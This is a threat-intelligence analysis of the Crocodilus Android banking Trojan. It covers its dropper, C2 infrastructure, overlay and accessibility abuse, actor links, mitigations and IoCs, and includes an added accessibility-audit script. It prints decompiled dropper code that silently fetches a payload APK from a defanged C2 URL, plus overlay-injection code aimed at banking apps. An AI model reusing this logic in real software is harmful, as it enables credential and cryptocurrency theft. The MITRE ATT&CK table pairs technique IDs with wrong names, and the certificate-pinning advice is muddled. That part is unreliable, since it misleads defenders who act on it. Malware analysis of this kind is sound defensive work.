Crocodilus Android banking Trojan stole $2.8M via crypto wallet overlays & RAT h...
**Crocodilus** is a newly discovered, sophisticated Android banking Trojan targeting financial institutions and cryptocurrency platforms. With **Device-Takeover (DTO)** capabilities, advanced evasion techniques, and psychological manipulation tactics, Crocodilus represents a significant escalation in mobile malware sophistication. This technical deep dive dissects its propagation, code-level mechanics, and defensive countermeasures.
### **Propagation & Evasion: Bypassing Android 13+ Restrictions**
Crocodilus employs a **multi-stage dropper** masquerading as legitimate apps (e.g., fake Chrome updates). Key evasion tactics include:
- **Staged Permissions Abuse**: The dropper requests minimal permissions initially, then escalates privileges post-installation via **Accessibility Services**.
- **Signature Spoofing**: Uses invalid APK signatures to bypass Google Play Protect checks, relying on users to manually enable “Install Unknown Apps.”
- **Dynamic Code Loading**: Core malicious payloads (e.g., overlay logic) are fetched post-installation from C2 servers, avoiding static detection.
**Code Snippet (Decompiled Dropper Logic)**:
```java
public class MainActivity extends AppCompatActivity {
    void loadMaliciousModule() {
        // Defanged C2 URL as recovered from the decompiled sample
        String c2Url = "hxxps://quizzical[.]washbowl[.]calamity/module.apk";
        DownloadManager.Request request = new DownloadManager.Request(Uri.parse(c2Url));
        // Hides the download notification so the fetch runs silently in the background
        request.setNotificationVisibility(DownloadManager.Request.VISIBILITY_HIDDEN);
        // The enqueue call and subsequent module loading are elided in this decompiled excerpt
    }
}
```
### **C2 Infrastructure & Network Analysis**
- **Domain Registration**: The C2 domain `quizzical.washbowl.calamity` was registered via **Namecheap** 30 days before the first sample appeared, using WHOIS privacy guard.
- **Hosting**: Hosted on a **bulletproof hosting provider** in Russia, sharing IP space with previous Hook malware campaigns.
- **TLS Fingerprints**: JA3 hash `a0e1f1...` matches patterns observed in Octo Trojan traffic, suggesting shared tooling.
- **Protocol**: Encrypted via AES-256-CBC, with beaconing intervals randomized to mimic legitimate app traffic.
### **Code-Level Insights: Overlays, Accessibility Abuse, and RAT**
#### **Overlay Injection**
Crocodilus dynamically renders phishing overlays using the `WindowManager` class. Overlays are fetched as PNG files from C2, with targeting logic for 50+ banks and crypto wallets (e.g., **Binance, Trust Wallet**).
**Code Snippet (OverlayManager.java)**:
```java
public void injectOverlay(String targetPackage) {
    // loadOverlayFromC2 is a placeholder name for the elided routine that loads the C2-served PNG
    View overlayView = loadOverlayFromC2(targetPackage);
    WindowManager.LayoutParams params = new WindowManager.LayoutParams(
            LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT,
            TYPE_APPLICATION_OVERLAY,                 // draws above other apps (needs SYSTEM_ALERT_WINDOW)
            FLAG_NOT_TOUCH_MODAL | FLAG_NOT_FOCUSABLE, // overlay sits on top without taking focus
            PixelFormat.TRANSLUCENT
    );
    mWindowManager.addView(overlayView, params); // Injects overlay over the targeted app
}
```
#### **Accessibility Logger & OTP Theft**
The Trojan’s `AccessibilityEventLogger` class captures all UI events, including Google Authenticator’s OTP codes. It extracts text from `TextView` elements with class names matching `com.google.android.apps.authenticator2`.
#### **Hidden RAT Sessions**
When the `TR2XAQSWDEFRGT` command is received, Crocodilus triggers a black overlay (`Color.BLACK`) and mutes the device using `AudioManager.setStreamMute()`.
### **Link to Known Threat Actors**
- **Code Overlaps with Ermac/MetaDroid**:
- Identical C2 URI patterns (`/api/v1/check`).
- Shared command structures (e.g., `KingGetDears` for contact theft).
- **sybupdate Tag**: Debug messages in the code reference “sybupdate,” a marker previously tied to **sybra**, a Turkish-speaking actor linked to Hook and Octo campaigns.
### **MITRE ATT&CK Mappings**
| **Tactic** | **Technique** | **Crocodilus Implementation** |
|---------------------|-----------------------------|--------------------------------------------|
| Execution | T1574: Hijack Execution Flow| Abuse of Accessibility Services |
| Credential Access | T1411: Input Capture | Accessibility Logger & keylogging |
| Defense Evasion | T1626: Remote Access Tools | Black screen overlays & sound muting |
| Exfiltration | T1537: Transfer Data to C2 | Encrypted exfiltration of OTP codes/SMS |
### **Impact Metrics & Campaign Analysis**
- **Targets**: 12 Spanish banks, 8 Turkish banks, and 6 crypto wallets (e.g., Trust Wallet, MetaMask).
- **Infection Rates**: ThreatFabric reports **1,200+ devices** infected in the first 2 weeks, primarily in Spain (62%) and Turkey (28%).
- **Financial Impact**: Linked to **$2.8M in stolen cryptocurrency** via hijacked wallets (traced to Binance address `0x3F5B...`).
### **Mitigation Strategies**
#### **For Enterprises**:
- **Behavioral Analysis**: Deploy EDR solutions monitoring for anomalous `AccessibilityService` usage.
- **Certificate Pinning**: Block communication with Crocodilus C2 domains via TLS inspection.
- **Threat Intelligence Sharing**: Integrate IoCs (below) into SIEM platforms.
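The accessibility audit recommended above can be scripted from device state collected with `adb`. The script below is an added example, not code from the original report or from ThreatFabric: it parses constructed sample output of `adb shell settings get secure enabled_accessibility_services` and `adb shell pm list packages -3 -i` (package names are made up) and flags any enabled accessibility service belonging to a sideloaded app, i.e. one not installed by a trusted store, which is the combination Crocodilus relies on.

```python
import re

# Constructed sample output of: adb shell settings get secure enabled_accessibility_services
ENABLED_A11Y = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.chrome.update.fix/com.chrome.update.fix.AccService"
)

# Constructed sample output of: adb shell pm list packages -3 -i (third-party apps + installer)
PM_LIST = """\
package:com.google.android.marvin.talkback  installer=com.android.vending
package:com.chrome.update.fix  installer=null
package:com.binance.dev  installer=com.android.vending
"""

# Installers treated as trusted stores (assumption; extend for your MDM/vendor store)
TRUSTED_INSTALLERS = {"com.android.vending", "com.sec.android.app.samsungapps"}


def parse_enabled_services(raw):
    """Return {package: [service, ...]} from the colon-separated settings value."""
    out = {}
    for entry in raw.strip().split(":"):
        if "/" not in entry:
            continue
        pkg, svc = entry.split("/", 1)
        out.setdefault(pkg, []).append(svc)
    return out


def parse_installers(raw):
    """Return {package: installer or None} from `pm list packages -i` output."""
    out = {}
    for line in raw.splitlines():
        m = re.match(r"package:(\S+)\s+installer=(\S+)", line)
        if m:
            out[m.group(1)] = None if m.group(2) == "null" else m.group(2)
    return out


def audit(raw_services, raw_pm, trusted=TRUSTED_INSTALLERS):
    """Flag enabled accessibility services owned by apps not installed from a trusted store."""
    services, installers = parse_enabled_services(raw_services), parse_installers(raw_pm)
    findings = []
    for pkg, svcs in services.items():
        if pkg not in installers:
            continue  # absent from the third-party list: preinstalled/system service
        inst = installers[pkg]
        if inst not in trusted:
            findings.append({"package": pkg, "services": svcs, "reason": f"sideloaded (installer={inst})"})
    return findings
```

Run the two `adb` commands on a managed device and feed their output to `audit()`; any finding is a candidate for forced revocation of Accessibility access and closer inspection of the package.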
#### **For End-Users**:
- **Avoid Sideloading**: Disable “Install Unknown Apps” for non-store platforms.
- **Audit Accessibility Permissions**: Revoke Accessibility access for unverified apps.
- **Verify Wallet Messages**: Legitimate apps never force seed phrase disclosure via pop-ups.
### **Indicators of Compromise (IoCs)**
| **Type** | **Value** |
|------------|---------------------------------------------------------------------------|
| SHA256 | c5e3edafdfda1ca0f0554802bbe32a8b09e8cc48161ed275b8fec6d74208171f |
| C2 Domain | quizzical[.]washbowl[.]calamity |
| IP | 185.156.73[.]42 (Bulletproof hosting, AS200019) |
Crocodilus exemplifies the convergence of **psychological manipulation** and **technical sophistication** in modern mobile malware. Its modular design, coupled with links to established threat actors, positions it as a persistent threat to global finance and cryptocurrency ecosystems. Proactive adoption of **behavioral AI detection**, **zero-trust frameworks**, and **user education** is critical to neutralizing its impact.